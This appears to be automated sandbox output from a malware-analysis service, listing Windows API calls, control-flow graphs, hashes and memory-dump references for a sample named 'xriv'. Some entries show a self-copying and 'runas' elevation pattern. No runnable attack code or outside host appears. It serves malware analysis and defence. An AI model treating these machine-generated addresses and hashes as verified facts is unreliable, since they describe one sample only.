                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 2ca62b583ee3324943808e3d210dd6b8d31f22eab93f7804719cbab4d2006099
                                                                        • Instruction ID: 418282cc9f98a1267bc395d0e5e19090d03fc64125e7ce73d5ef540871d02a90
                                                                        • Opcode Fuzzy Hash: 2ca62b583ee3324943808e3d210dd6b8d31f22eab93f7804719cbab4d2006099
                                                                        • Instruction Fuzzy Hash: 4AE04F35011148BBCF31AF14D80CA9D3BA9EB20251F264425F50587125CB35EDC1EB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01217776), ref: 01217A79
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: f619417a5f90f278f77d2d100540a247f291d8e70f06d6ee3f5a38cf60e501e7
                                                                        • Instruction ID: 55bb6c35bc5a5fa5810b68dc5380d438aa31f5d36381cf333078b3ff5d1fdce4
                                                                        • Opcode Fuzzy Hash: f619417a5f90f278f77d2d100540a247f291d8e70f06d6ee3f5a38cf60e501e7
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(01239708,00000FA0,?,?,01217028), ref: 01217056
                                                                        • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01217028), ref: 01217061
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01217028), ref: 01217072
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01217084
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01217092
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01217028), ref: 012170B5
                                                                        • ___scrt_fastfail.LIBCMT ref: 012170C6
                                                                        • DeleteCriticalSection.KERNEL32(01239708,00000007,?,?,01217028), ref: 012170D1
                                                                        • CloseHandle.KERNEL32(00000000,?,?,01217028), ref: 012170E1
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 0121706D
                                                                        • SleepConditionVariableCS, xrefs: 0121707E
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0121705C
                                                                        • WakeAllConditionVariable, xrefs: 0121708A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 3578986977-3242537097
                                                                        • Opcode ID: 54f5ef6d027c75c0edc1d15c0bbe58a6625dea8048943babdb2959d0fc3c5009
                                                                        • Instruction ID: 2cb08f738ff54e642cb56805b09433001b314c2c11b9dcbcd72be97f056f01dd
                                                                        • Opcode Fuzzy Hash: 54f5ef6d027c75c0edc1d15c0bbe58a6625dea8048943babdb2959d0fc3c5009
                                                                        • Instruction Fuzzy Hash: 8001B9B46713117BEF325F797C0D99E3AD8DB95B40B121024FB00D624CEAB488009760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 01222368: CreateFileW.KERNELBASE(00000000,00000000,?,01222758,?,?,00000000,?,01222758,00000000,0000000C), ref: 01222385
                                                                        • GetLastError.KERNEL32 ref: 012227C3
                                                                        • __dosmaperr.LIBCMT ref: 012227CA
                                                                        • GetFileType.KERNELBASE(00000000), ref: 012227D6
                                                                        • GetLastError.KERNEL32 ref: 012227E0
                                                                        • __dosmaperr.LIBCMT ref: 012227E9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01222809
                                                                        • CloseHandle.KERNEL32(0121D4F0), ref: 01222956
                                                                        • GetLastError.KERNEL32 ref: 01222988
                                                                        • __dosmaperr.LIBCMT ref: 0122298F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: 0ff792623eb08b247d4e25ed487d2d39908aad7d77ad1e43358e80a5689f99e7
                                                                        • Instruction ID: ee852758f84aa34dae8c49a14ff159b66db301ae37e3c299081c22bf9a2e98c8
                                                                        • Opcode Fuzzy Hash: 0ff792623eb08b247d4e25ed487d2d39908aad7d77ad1e43358e80a5689f99e7
                                                                        • Instruction Fuzzy Hash: 27A14732A24165EFCF29DF68D855BBD3BF1AB0A320F140159F911AF391CB769842CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 81 1209c30-1209cba call 1215ac0 call 1202ce0 GetTempPathA 86 1209cc0-1209cc5 81->86 86->86 87 1209cc7-1209d5b call 1215e20 call 1215f70 86->87 93 1209d8c-1209e02 call 1215ac0 call 1202ce0 call 12162f0 call 1215f70 87->93 94 1209d5d-1209d6c 87->94 116 1209e33-1209e5b 93->116 117 1209e04-1209e13 93->117 96 1209d82-1209d89 call 1217684 94->96 97 1209d6e-1209d7c 94->97 96->93 97->96 99 120a181 call 121bcdc 97->99 105 120a186 99->105 107 120a18b-120a1b8 call 12159a0 * 2 CopyFileA call 1205120 105->107 108 120a186 call 121bcdc 105->108 129 120a209-120a20b call 121aa9f 107->129 130 120a1ba-120a201 call 1215a80 call 1215ac0 call 1215a80 call 1203b10 107->130 108->107 121 1209e8c-1209edf GetModuleFileNameA 116->121 122 1209e5d-1209e6c 116->122 119 1209e15-1209e23 117->119 120 1209e29-1209e30 call 1217684 117->120 119->105 119->120 120->116 124 1209ee0-1209ee5 121->124 126 1209e82-1209e89 call 1217684 122->126 127 1209e6e-1209e7c 122->127 124->124 131 1209ee7-1209f38 call 1215e20 124->131 126->121 127->105 127->126 139 120a210-120a215 call 121bcdc 129->139 170 120a206 130->170 142 1209f94-1209fb4 call 121ab6c 131->142 143 1209f3a-1209f3d 131->143 156 1209fb6-1209fd9 call 121abfa call 121ae87 142->156 157 1209fdc-120a000 call 121ab6c 142->157 147 1209f51-1209f54 143->147 148 1209f3f 143->148 152 1209f56-1209f5a 147->152 153 1209f8a 147->153 151 1209f40-1209f44 148->151 151->152 158 1209f46-1209f4f 151->158 159 1209f83-1209f88 152->159 160 1209f5c-1209f5f 152->160 154 1209f8c-1209f8e 153->154 154->142 162 120a083-120a08c 154->162 156->157 173 120a010-120a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 157->173 174 120a002-120a00b call 121abfa 157->174 158->147 158->151 159->154 160->153 165 1209f61-1209f67 160->165 168 120a08e-120a099 162->168 169 120a0bf-120a0e3 162->169 165->159 166 1209f69-1209f6c 165->166 166->153 172 1209f6e-1209f74 166->172 175 120a09b-120a0a9 168->175 176 120a0af-120a0bc call 1217684 168->176 178 120a110-120a134 169->178 179 120a0e5-120a0f0 169->179 170->129 172->159 182 1209f76-1209f79 172->182 198 120a077-120a07d 173->198 199 120a06f-120a071 173->199 174->129 174->162 175->139 175->176 176->169 184 120a165-120a180 call 1217012 178->184 185 120a136-120a145 178->185 180 120a0f2-120a100 179->180 181 120a106-120a10d call 1217684 179->181 180->139 180->181 181->178 182->153 190 1209f7b-1209f81 182->190 193 120a147-120a155 185->193 194 120a15b-120a162 call 1217684 185->194 190->153 190->159 193->139 193->194 194->184 198->162 199->107 199->198
                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 01209C90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTemp
                                                                        • String ID:
                                                                        • API String ID: 2920410445-0
                                                                        • Opcode ID: 590676a2a6e8bd8b7fb2b06ea83b4dd5708044aea8cc5ef9800938312201dc1c
                                                                        • Instruction ID: f492b8cd1efc6d3ca2db0cada90fb1529ccae6902ca32179e25d8994c3766c54
                                                                        • Opcode Fuzzy Hash: 590676a2a6e8bd8b7fb2b06ea83b4dd5708044aea8cc5ef9800938312201dc1c
                                                                        • Instruction Fuzzy Hash: 47A190B09102688BDF21DB24CC447DDBBB9AB55314F8046D8D60967282DB755FC8CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 203 1203ff0-1204050 call 12162f0 call 1216070 208 1204052-120405e 203->208 209 120407e-12040fa call 1215ac0 * 2 call 1202ce0 call 1215e20 call 1203b10 203->209 210 1204060-120406e 208->210 211 1204074-120407b call 1217684 208->211 234 1204128-120412e 209->234 235 12040fc-1204108 209->235 210->211 213 12041b7 call 121bcdc 210->213 211->209 219 12041bc-120428a call 121bcdc call 1215ac0 call 1202ce0 call 1216070 call 1215ac0 call 1202ce0 call 1215e20 call 1203b10 213->219 264 12042b4-12042c5 Sleep 219->264 265 120428c-1204298 219->265 239 1204130-120413c 234->239 240 1204158-1204170 234->240 237 120410a-1204118 235->237 238 120411e-1204125 call 1217684 235->238 237->219 237->238 238->234 245 120414e-1204155 call 1217684 239->245 246 120413e-120414c 239->246 241 1204172-120417e 240->241 242 120419a-12041b6 call 1217012 240->242 247 1204190-1204197 call 1217684 241->247 248 1204180-120418e 241->248 245->240 246->219 246->245 247->242 248->219 248->247 266 12042c7-12042d3 264->266 267 12042ef-1204308 call 1217012 264->267 268 12042aa-12042b1 call 1217684 265->268 269 120429a-12042a8 265->269 272 12042e5-12042ec call 1217684 266->272 273 12042d5-12042e3 266->273 268->264 269->268 270 1204309 call 121bcdc 269->270 276 120430e-120435f call 121bcdc call 1203740 270->276 272->267 273->272 273->276 286 1204361 276->286 287 1204363-1204370 SetCurrentDirectoryA 276->287 286->287 288 1204372-120437e 287->288 289 120439e-1204458 call 1215ac0 call 1202ce0 call 1215ac0 call 1202ce0 call 1216070 call 1215f70 call 1215ac0 call 1202ce0 call 1215e20 call 1203b10 287->289 290 1204380-120438e 288->290 291 1204394-120439b call 1217684 288->291 321 1204486-120449e 289->321 322 120445a-1204466 289->322 290->291 293 1204558 call 121bcdc 290->293 291->289 299 120455d call 121bcdc 293->299 304 1204562-1204567 call 121bcdc 299->304 325 12044a0-12044ac 321->325 326 12044cc-12044e4 321->326 323 1204468-1204476 322->323 324 120447c-1204483 call 1217684 322->324 323->299 323->324 324->321 328 12044c2-12044c9 call 1217684 325->328 329 12044ae-12044bc 325->329 330 12044e6-12044f2 326->330 331 120450e-1204514 326->331 328->326 329->299 329->328 336 1204504-120450b call 1217684 330->336 337 12044f4-1204502 330->337 332 1204516-1204522 331->332 333 120453e-1204557 call 1217012 331->333 338 1204534-120453b call 1217684 332->338 339 1204524-1204532 332->339 336->331 337->299 337->336 338->333 339->304 339->338
                                                                        APIs
                                                                        • Sleep.KERNEL32(000003E8), ref: 012042B9
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,FDD920DC), ref: 01204364
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectorySleep
                                                                        • String ID: runas
                                                                        • API String ID: 16921501-4000483414
                                                                        • Opcode ID: 073ac07f9132f189e8d4262f923c55a653e73306d01ec7ea6ded729505ba3f46
                                                                        • Instruction ID: 633245dc0b609e5cd836f58ca65e5b0112f0e9d3c6793b1451d6dd646d89e393
                                                                        • Opcode Fuzzy Hash: 073ac07f9132f189e8d4262f923c55a653e73306d01ec7ea6ded729505ba3f46
                                                                        • Instruction Fuzzy Hash: 18E16C71A202849FDB09EB78CC457ADBFB5EFA1314F54835CE501AB3C6DB758A408792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 347 120a032-120a034 348 120a053-120a06d GetFileAttributesA 347->348 349 120a036-120a04d CreateDirectoryA 347->349 350 120a077-120a08c 348->350 351 120a06f-120a071 348->351 349->348 354 120a08e-120a099 350->354 355 120a0bf-120a0e3 350->355 351->350 352 120a18b-120a1b8 call 12159a0 * 2 CopyFileA call 1205120 351->352 383 120a209-120a20b call 121aa9f 352->383 384 120a1ba-120a206 call 1215a80 call 1215ac0 call 1215a80 call 1203b10 352->384 357 120a09b-120a0a9 354->357 358 120a0af-120a0bc call 1217684 354->358 359 120a110-120a134 355->359 360 120a0e5-120a0f0 355->360 357->358 367 120a210-120a215 call 121bcdc 357->367 358->355 365 120a165-120a180 call 1217012 359->365 366 120a136-120a145 359->366 362 120a0f2-120a100 360->362 363 120a106-120a10d call 1217684 360->363 362->363 362->367 363->359 372 120a147-120a155 366->372 373 120a15b-120a162 call 1217684 366->373 372->367 372->373 373->365 383->367 384->383
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0120A04D
                                                                        • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0120A068
                                                                        • CopyFileA.KERNEL32 ref: 0120A1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCopyCreateDirectory
                                                                        • String ID:
                                                                        • API String ID: 210682061-0
                                                                        • Opcode ID: 37d09420753e7a9d66896993eb66124d92d376eed8909340d3bf9934ab44adbd
                                                                        • Instruction ID: 6bb025133726da9bb76a95e996ff0ec18bf7a8236372db5a83d8fc76a1bf23ef
                                                                        • Opcode Fuzzy Hash: 37d09420753e7a9d66896993eb66124d92d376eed8909340d3bf9934ab44adbd
                                                                        • Instruction Fuzzy Hash: E6410BB1A202188FDB25DB28CC8979CBB75AF65314F8406DCD609A72C3DB355BC48F66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 394 1220a55-1220a6a GetEnvironmentStringsW 395 1220ac5 394->395 396 1220a6c-1220a8d call 1220a1e call 1220971 394->396 397 1220ac7-1220ac9 395->397 396->395 404 1220a8f-1220a90 call 121db3c 396->404 399 1220ad2-1220ad8 397->399 400 1220acb-1220acc FreeEnvironmentStringsW 397->400 400->399 406 1220a95-1220a9a 404->406 407 1220aba 406->407 408 1220a9c-1220ab2 call 1220971 406->408 409 1220abc-1220ac3 call 121d653 407->409 408->407 413 1220ab4-1220ab8 408->413 409->397 413->409
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 01220A5E
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01220ACC
                                                                          • Part of subcall function 01220971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01224B40,?,00000000,00000000), ref: 01220A13
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • _free.LIBCMT ref: 01220ABD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 2560199156-0
                                                                        • Opcode ID: e1dfad1857ee5f32cc72efee21fb691a9d6367ce10add0775825c44184783c2d
                                                                        • Instruction ID: 08de661fefb8fe1fa8a5cc4f39a6e3491bf602c39c9e29b0a1a2569662df8dc5
                                                                        • Opcode Fuzzy Hash: e1dfad1857ee5f32cc72efee21fb691a9d6367ce10add0775825c44184783c2d
                                                                        • Instruction Fuzzy Hash: C401ACA36212767F773155BA1C8CC7F6D6DCED2D903450229FB05D2204FD658D0282B8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 423 1209d04-1209d13 424 1209d15-1209d23 423->424 425 1209d29-1209d5b call 1217684 423->425 424->425 426 120a181 call 121bcdc 424->426 432 1209d8c-1209e02 call 1215ac0 call 1202ce0 call 12162f0 call 1215f70 425->432 433 1209d5d-1209d6c 425->433 431 120a186 426->431 434 120a18b-120a1b8 call 12159a0 * 2 CopyFileA call 1205120 431->434 435 120a186 call 121bcdc 431->435 459 1209e33-1209e5b 432->459 460 1209e04-1209e13 432->460 437 1209d82-1209d89 call 1217684 433->437 438 1209d6e-1209d7c 433->438 452 120a209-120a20b call 121aa9f 434->452 453 120a1ba-120a206 call 1215a80 call 1215ac0 call 1215a80 call 1203b10 434->453 435->434 437->432 438->426 438->437 461 120a210-120a215 call 121bcdc 452->461 453->452 466 1209e8c-1209edf GetModuleFileNameA 459->466 467 1209e5d-1209e6c 459->467 464 1209e15-1209e23 460->464 465 1209e29-1209e30 call 1217684 460->465 464->431 464->465 465->459 469 1209ee0-1209ee5 466->469 472 1209e82-1209e89 call 1217684 467->472 473 1209e6e-1209e7c 467->473 469->469 475 1209ee7-1209f38 call 1215e20 469->475 472->466 473->431 473->472 483 1209f94-1209fb4 call 121ab6c 475->483 484 1209f3a-1209f3d 475->484 494 1209fb6-1209fd9 call 121abfa call 121ae87 483->494 495 1209fdc-120a000 call 121ab6c 483->495 487 1209f51-1209f54 484->487 488 1209f3f 484->488 491 1209f56-1209f5a 487->491 492 1209f8a 487->492 490 1209f40-1209f44 488->490 490->491 496 1209f46-1209f4f 490->496 497 1209f83-1209f88 491->497 498 1209f5c-1209f5f 491->498 493 1209f8c-1209f8e 492->493 493->483 500 120a083-120a08c 493->500 494->495 509 120a010-120a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 495->509 510 120a002-120a00b call 121abfa 495->510 496->487 496->490 497->493 498->492 502 1209f61-1209f67 498->502 505 120a08e-120a099 500->505 506 120a0bf-120a0e3 500->506 502->497 503 1209f69-1209f6c 502->503 503->492 508 1209f6e-1209f74 503->508 511 120a09b-120a0a9 505->511 512 120a0af-120a0bc call 1217684 505->512 514 120a110-120a134 506->514 515 120a0e5-120a0f0 506->515 508->497 518 1209f76-1209f79 508->518 534 120a077-120a07d 509->534 535 120a06f-120a071 509->535 510->452 510->500 511->461 511->512 512->506 520 120a165-120a180 call 1217012 514->520 521 120a136-120a145 514->521 516 120a0f2-120a100 515->516 517 120a106-120a10d call 1217684 515->517 516->461 516->517 517->514 518->492 526 1209f7b-1209f81 518->526 529 120a147-120a155 521->529 530 120a15b-120a162 call 1217684 521->530 526->492 526->497 529->461 529->530 530->520 534->500 535->434 535->534
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01209EB5
                                                                        • CopyFileA.KERNEL32 ref: 0120A1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CopyModuleName
                                                                        • String ID:
                                                                        • API String ID: 4108865673-0
                                                                        • Opcode ID: 60d10041f85a72e62e0cf088379b30e26ea4be7a449f939505c47377f6419f71
                                                                        • Instruction ID: e1a2f22e41dbbae26181ac2e39a2ef4dae3c4863f959641af84ac6c48788a1e3
                                                                        • Opcode Fuzzy Hash: 60d10041f85a72e62e0cf088379b30e26ea4be7a449f939505c47377f6419f71
                                                                        • Instruction Fuzzy Hash: BAC16AB1A202558BDF25DB28CC487ADBB75ABA1214F8442DCD24DA72C3DB319FC48F65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 539 121c59c-121c5b2 540 121c5b8-121c5d8 539->540 541 121c6bd 539->541 543 121c67b-121c6bb call 121a831 * 4 540->543 544 121c5de-121c5ea 540->544 542 121c6c0-121c6c4 541->542 543->542 545 121c5ec 544->545 546 121c5ee-121c5f3 544->546 545->546 548 121c5f5-121c5f7 546->548 549 121c5f8-121c5fa 546->549 548->549 551 121c619-121c637 call 1220e41 call 121d653 549->551 552 121c5fc-121c600 call 1220e41 549->552 551->541 566 121c63d-121c667 551->566 558 121c605-121c617 call 121d653 552->558 558->551 558->566 566->543 568 121c669-121c66c 566->568 569 121c66e-121c676 568->569 569->569 570 121c678 569->570 570->543
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9d34a03dca84f4d8663d9bdbd88c18d34bc0fd4ada6dae1423be0642be56ae4a
                                                                        • Instruction ID: ef486b85e1d7ffc7cb538dfe0f3b499c73ef79b6af472903e3feba62ad55e1af
                                                                        • Opcode Fuzzy Hash: 9d34a03dca84f4d8663d9bdbd88c18d34bc0fd4ada6dae1423be0642be56ae4a
                                                                        • Instruction Fuzzy Hash: FB41C276A10215AFCB20DF68C880A6EB7F5EFE9714B1645A9DA15EB345D730ED02CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 571 1224d8f-1224d9a 572 1224da7-1224dad 571->572 573 1224d9c-1224da5 call 121db3c 571->573 574 1224db8-1224dbb 572->574 575 1224daf-1224db6 call 121d653 572->575 581 1224dcb-1224dcd 573->581 578 1224de2-1224df4 RtlReAllocateHeap 574->578 579 1224dbd-1224dc2 call 121b7f0 574->579 587 1224dc8 575->587 582 1224df6 578->582 583 1224dce-1224dd5 call 121ccd1 578->583 579->587 586 1224dca 582->586 583->579 591 1224dd7-1224de0 call 121bd47 583->591 586->581 587->586 591->578 591->579
                                                                        APIs
                                                                        • _free.LIBCMT ref: 01224DB0
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,01220E8A,?,00000004,00000002,?,?,?,0121C625,?,00000002), ref: 01224DEC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap$_free
                                                                        • String ID:
                                                                        • API String ID: 1482568997-0
